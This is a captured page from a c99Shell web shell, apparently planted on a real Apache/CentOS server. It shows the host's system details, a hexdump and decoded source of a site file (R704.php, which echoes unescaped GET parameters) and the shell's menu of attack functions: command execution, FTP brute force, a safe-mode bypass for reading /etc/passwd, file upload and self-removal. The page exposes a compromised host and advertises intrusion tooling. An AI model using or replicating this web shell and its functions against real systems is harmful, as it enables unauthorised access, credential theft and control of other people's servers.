110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/reportEregis111/ drwxr-xr-x Free 52.62 GB of 127.8 GB (41.18%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/reportEregis111/ drwxr-xr-x
Free 52.62 GB of 127.8 GB (41.18%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: R704.php (711 B) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

Information:

Path	/var/www/html/reportEregis111/R704.php
Size	711 B
MD5	1dc12c396621fa0274e93c20c5929627
Owner/Group	root/root
Perms	-rw-r--r--
Create time	13/02/2021 08:35:39
Access time	11/07/2024 12:26:23
MODIFY time	12/12/2018 13:12:08

FULL HEXDUMP

00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0
000001F8
00000210
00000228
00000240
00000258
00000270
00000288
000002A0
000002B8

0A 3C 3F 70 68 70 0A 73 65 73 73 69 6F 6E 5F 73 74 61 72 74 28 29 3B 0A
65 72 72 6F 72 5F 72 65 70 6F 72 74 69 6E 67 28 45 5F 41 4C 4C 29 3B 0A
69 6E 63 6C 75 64 65 28 22 50 46 42 43 2F 46 6F 72 6D 2E 70 68 70 22 29
3B 0A 0A 69 66 28 69 73 73 65 74 28 24 5F 50 4F 53 54 5B 22 66 6F 72 6D
22 5D 29 29 20 7B 0A 09 46 6F 72 6D 3A 3A 69 73 56 61 6C 69 64 28 24 5F
50 4F 53 54 5B 22 66 6F 72 6D 22 5D 29 3B 0A 09 68 65 61 64 65 72 28 22
4C 6F 63 61 74 69 6F 6E 3A 20 22 20 2E 20 24 5F 53 45 52 56 45 52 5B 22
50 48 50 5F 53 45 4C 46 22 5D 29 3B 0A 09 65 78 69 74 28 29 3B 09 0A 7D
0A 0A 69 6E 63 6C 75 64 65 28 22 68 65 61 64 65 72 2E 70 68 70 22 29 3B
0A 24 76 65 72 73 69 6F 6E 20 3D 20 66 69 6C 65 5F 67 65 74 5F 63 6F 6E
74 65 6E 74 73 28 22 76 65 72 73 69 6F 6E 22 29 3B 0A 3F 3E 0A 3C 75 6C
20 63 6C 61 73 73 3D 22 62 72 65 61 64 63 72 75 6D 62 22 3E 0A 09 3C 69
6D 67 20 73 72 63 3D 22 69 6D 67 2F 68 6F 6D 65 2E 70 6E 67 22 20 77 69
64 74 68 3D 22 33 32 22 20 68 65 69 67 68 74 3D 22 33 32 22 3E 20 26 6E
62 73 70 3B 26 6E 62 73 70 3B 3C 62 3E BC D9 E9 E0 A2 E9 D2 E3 AA E9 A7
D2 B9 C3 D0 BA BA 20 3A 3A 3C 2F 62 3E 26 6E 62 73 70 3B 26 6E 62 73 70
3B 3C 62 3E 49 44 3A 3C 2F 62 3E 26 6E 62 73 70 3B 3C 3F 3D 24 5F 47 45
54 5B 27 55 73 65 72 27 5D 3F 3E 20 3C 66 6F 6E 74 20 73 69 7A 65 3D 22
36 22 3E 3C 73 70 61 6E 20 63 6C 61 73 73 3D 22 6C 61 62 65 6C 20 6C 61
62 65 6C 2D 69 6E 66 6F 22 3E 3C 3F 3D 24 5F 47 45 54 5B 27 6E 61 6D 65
27 5D 3F 3E 3C 2F 73 70 61 6E 3E 3C 2F 66 6F 6E 74 3E 0A 3C 2F 75 6C 3E
0A 3C 73 63 72 69 70 74 3E 0A 09 66 75 6E 63 74 69 6F 6E 20 67 6F 42 61
63 6B 28 29 20 7B 0A 09 09 77 69 6E 64 6F 77 2E 68 69 73 74 6F 72 79 2E
62 61 63 6B 28 29 3B 0A 09 7D 0A 3C 2F 73 63 72 69 70 74 3E 0A 3C 69 66
72 61 6D 65 20 73 72 63 3D 22 6D 65 6D 2E 70 68 70 3F 6E 61 6D 65 3D 3C
3F 3D 24 5F 47 45 54 5B 27 6E 61 6D 65 27 5D 3F 3E 26 26 55 73 65 72 3D
3C 3F 3D 24 5F 47 45 54 5B 27 55 73 65 72 27 5D 3F 3E 22 20 68 65 69 67
68 74 3D 22 36 30 30 22 20 77 69 64 74 68 3D 22 31 30 30 25 22 3E 3C 2F
69 66 72 61 6D 65 3E 0A 3C 3F 70 68 70 0A 69 6E 63 6C 75 64 65 28 22 66
6F 6F 74 65 72 2E 70 68 70 22 29 3B 0A 3F 3E

<?php session_start();
error_reporting(E_ALL);
include("PFBC/Form.php")
; if(isset($_POST["form
"])) { Form::isValid($_
POST["form"]); header("
Location: " . $_SERVER["
PHP_SELF"]); exit(); }
include("header.php");
$version = file_get_con
tents("version"); ?> <ul
class="breadcrumb"> <i
mg src="img/home.png" wi
dth="32" height="32"> &n
bsp; <b>јЩйаўйТгЄй§
Т№ГРєє ::</b> &nbsp
;<b>ID:</b> <?=$_GE
T['User']?> <font size="
6"><span class="label la
bel-info"><?=$_GET['name
']?></span></font> </ul>
<script> function goBa
ck() { window.history.
back(); } </script> <if
rame src="mem.php?name=<
?=$_GET['name']?>&&User=
<?=$_GET['User']?>" heig
ht="600" width="100%"></
iframe> <?php include("f
ooter.php"); ?>

HEXDUMP: [Full] [Preview]
Base64: [Encode] [+chunk] [+chunk+quotes] [Decode]

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0102 ]--